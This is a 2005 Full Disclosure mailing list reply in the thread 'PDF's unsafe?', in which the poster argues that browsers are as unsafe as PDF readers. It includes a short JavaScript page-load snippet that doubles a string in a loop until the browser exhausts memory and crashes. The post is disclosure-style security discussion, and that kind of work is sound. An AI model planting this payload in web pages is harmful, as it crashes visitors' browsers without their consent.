Full Disclosure mailing list archives
Re: PDF's unsafe?
From: Bipin Gautam <gautam.bipin () gmail com>
Date: Thu, 22 Sep 2005 15:37:51 +0545
On 9/21/05, Geo. <geoincidents () nls net> wrote:
Haven't any of the security firms checked out adobe pdf reader to see if it's safe? It took 5 minutes to create this nonsense http://www.nthelp.com/test.pdf and that's just using the standard features. I hate to think what a real hacker could do with a pdf. Geo.
Even if you have the option in IE "Play videos in webpage" unchecked... the following page will render.... http://bipin.sosvulnerable.net/temp/fdrd.html & probably your OS will colse the browser after it runs out of memory. Or maybe try this: /* ------------ <body onload="hUNT()"> <script language="JavaScript"><!-- var szhUNT="...cauz its a jungle out there!" function hUNT() {szhUNT=szhUNT + szhUNT window.status="String Length is: "+szhUNT.length window.setTimeout('hUNT()',1);} // --></script> --------------------------- */ SO IE/mozilla is unsafe? Bipin Gautam http://bipin.tk Zeroth law of security: The possibility of poking a system from lower privilege is zero unless & until there is possibility of direct, indirect or consequential communication between the two... _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: PDF's unsafe?, (continued)
- Re: PDF's unsafe? Brent Colflesh (Sep 21)
- Re: PDF's unsafe? Micheal Espinola Jr (Sep 21)
- RE: PDF's unsafe? ad (Sep 21)
- Message not available
- Re: PDF's unsafe? Micheal Espinola Jr (Sep 21)
- RE: PDF's unsafe? Geo. (Sep 21)
- Re: PDF's unsafe? Micheal Espinola Jr (Sep 21)
- Re: PDF's unsafe? Matthew Murphy (Sep 21)
- Re: PDF's unsafe? Alex (Sep 21)
- RE: PDF's unsafe? y0himba (Sep 21)